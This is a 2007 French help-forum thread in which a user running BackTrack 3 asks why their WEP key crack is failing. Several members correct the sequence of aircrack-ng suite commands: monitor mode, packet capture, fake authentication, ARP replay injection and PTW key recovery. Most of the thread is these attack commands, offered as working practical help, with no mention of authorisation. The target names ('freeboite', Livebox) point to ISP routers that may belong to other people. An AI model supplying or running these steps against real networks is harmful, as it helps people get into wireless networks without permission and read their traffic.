Est ce la bonne manip sous bt3 (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-12-2007 12:51:51

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Est ce la bonne manip sous bt3

voici les commande que j'ai utilisé les unes apres les autres...

airmon-ng
airmon-ng start wlan0
ifconfig wlan0
airmon-ng start wlan0
airodump-ng --write freeboite wlan0
airodump-ng --write capture_freeboite - channel11 --bssid (adresse mac)
airodump-ng --write freeboite wlan0
airodump-ng --write freeboite --channel11 wlan0
airodump-ng --write capture_freeboite - channel11 --bssid (adresse mac) wlan0
airplay-ng -3 -e freeboite -a (adresse mac° -h (mac station) wlan0

Qu'est ce qu'il ne va pas la dedans ?

J'ai reussi a avoir seullement 8IVS mais pres de 3000000 #Data.

Je ne comprend vraiment pas

Dernière modification par mcvovol (19-12-2007 13:08:15)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-12-2007 12:55:32

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : Est ce la bonne manip sous bt3

mcvovol a écrit :

Qu'est ce qu'il ne va pas la dedans ?

Beaucoup de choses.

- Tu fais des erreurs dans tes commandes.
- ipconfig ??

Dernière modification par Tex-Twil (19-12-2007 12:56:00)

Hors Ligne

#3 19-12-2007 13:10:45

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Re : Est ce la bonne manip sous bt3

Oui dsl pour l'érreure.

Je viens de la corriger.

Tout va bien jusqu'a ce qu'il scan le reseau cible avec cette commande : airodump-ng --write tuto --channel 11 rausb0

Ensuite gros cafouillage... Le probleme bien des ivs a mon avis car il a scanné toute la nuit pour en trouver seullement 8

Hors Ligne

#4 19-12-2007 13:27:50

nyc93
Membre
Inscription : 07-05-2006
Messages : 45

Re : Est ce la bonne manip sous bt3

mcvovol a écrit :

voici les commande que j'ai utilisé les unes apres les autres...

airmon-ng
airmon-ng start wlan0
ifconfig wlan0
airmon-ng start wlan0
airodump-ng --write freeboite wlan0
airodump-ng --write capture_freeboite - channel11 --bssid (adresse mac)
airodump-ng --write freeboite wlan0
airodump-ng --write freeboite --channel11 wlan0
airodump-ng --write capture_freeboite - channel11 --bssid (adresse mac) wlan0
airplay-ng -3 -e freeboite -a (adresse mac° -h (mac station) wlan0

Qu'est ce qu'il ne va pas la dedans ?

J'ai reussi a avoir seullement 8IVS mais pres de 3000000 #Data.

Je ne comprend vraiment pas

Plus simple
airmon-ng start wlan0
airodump-ng --w wep --ivs --channel ? wlan0
airodump-ng -1 0 -e bssid -a mac -h mac station wlan0
airodump-ng -3 -e bssid -a mac -b mac -h mac station -x 500 wlan0
aircrack-ng -b mac wep-01.ivs

Hors Ligne

#5 19-12-2007 15:16:32

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Re : Est ce la bonne manip sous bt3

Merci nyc93

Mais je ne comprend pas la synthaxe de cette ligne airodump-ng -3 -e bssid -a mac -b mac -h mac station -x 500 wlan0

-a mac -b mac (le mac correspond t'il a l'adresse mac du reseau wifi ?)

Merci pour ton aide

Mcvovol

Hors Ligne

#6 19-12-2007 15:26:32

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Est ce la bonne manip sous bt3

airodump-ng -3 -e (ex: livebox) -a (colonne en haut à gauche bssid) -h (colonne station) wlan0

Hors Ligne

#7 19-12-2007 16:00:26

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : Est ce la bonne manip sous bt3

je pense que vous confondez airodump avec aireplay.

Hors Ligne

#8 19-12-2007 16:20:29

nyc93
Membre
Inscription : 07-05-2006
Messages : 45

Re : Est ce la bonne manip sous bt3

mcvovol a écrit :

Merci nyc93

Mais je ne comprend pas la synthaxe de cette ligne airodump-ng -3 -e bssid -a mac -b mac -h mac station -x 500 wlan0

-a mac -b mac (le mac correspond t'il a l'adresse mac du reseau wifi ?)

Merci pour ton aide

Mcvovol

oui

Hors Ligne

#9 19-12-2007 16:28:00

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Est ce la bonne manip sous bt3

je me suis trompé :

aireplay-ng -3 -e (ex: livebox) -a (colonne en haut à gauche bssid dans airodump) -h (colonne station dans airodump) wlan0

Hors Ligne

#10 19-12-2007 20:59:30

dieuthegod
Membre
Inscription : 15-03-2007
Messages : 173

Re : Est ce la bonne manip sous bt3

je crois que dans le tuto c'est bien expliqué!

enfin il me semble big_smile


ASUS G1S avec 4965 en norme N
BT3 sur clef USB et en vmware
ALFA 500 mW dès que j'ai besoin de puissance et d'une injection au top

Hors Ligne

#11 19-12-2007 22:07:21

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Re : Est ce la bonne manip sous bt3

Donc :


airmon-ng start wlan0
airodump-ng --w wep --ivs --channel ? wlan0
aireplay-ng -1 0 -e bssid -a mac -h mac station wlan0
aireplay-ng -3 -e bssid -a mac -b mac -h mac station -x 500 wlan0
aircrack-ng -b mac wep-01.ivs

C'est la bonne manip ?

Hors Ligne

#12 19-12-2007 22:37:18

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Est ce la bonne manip sous bt3

ne rajoute pas ivs dans airodump si tu veut utiliser l'algoritme ptw (il fonctionne avec les fichiers cap)

Hors Ligne

#13 19-12-2007 22:50:02

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Re : Est ce la bonne manip sous bt3

aircrack-ng -b mac wep-01.cap

c'est bien ca ?

Dernière modification par mcvovol (19-12-2007 22:53:45)

Hors Ligne

#14 19-12-2007 22:57:56

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Est ce la bonne manip sous bt3

moi j'utilise: aircrack-ng -P2 wep-01.cap

Hors Ligne

#15 19-12-2007 23:00:21

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : Est ce la bonne manip sous bt3

http://bricowifi.blogspot.com/2007/11/c … ivers.html

tu peut cliquer sur les images pour les agrandir, il y a toute les étapes

Hors Ligne

#16 19-12-2007 23:34:06

mcvovol
Membre
Inscription : 18-12-2007
Messages : 9

Re : Est ce la bonne manip sous bt3

Merci je vasi esseyer mais je crains que ma mbr est morte sur le disque dure ou je dois l'installer...

Enfin je vais esseyer quand meme merci du tuyau

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 3526 02-02-2011 23:35:58 par dclem51
0 1660 11-12-2010 23:35:42 par nono ptirobo
3 2680 09-04-2010 15:47:43 par dédé
1 981 26-08-2009 13:42:12 par dédé
6 23248 03-07-2009 03:39:48 par general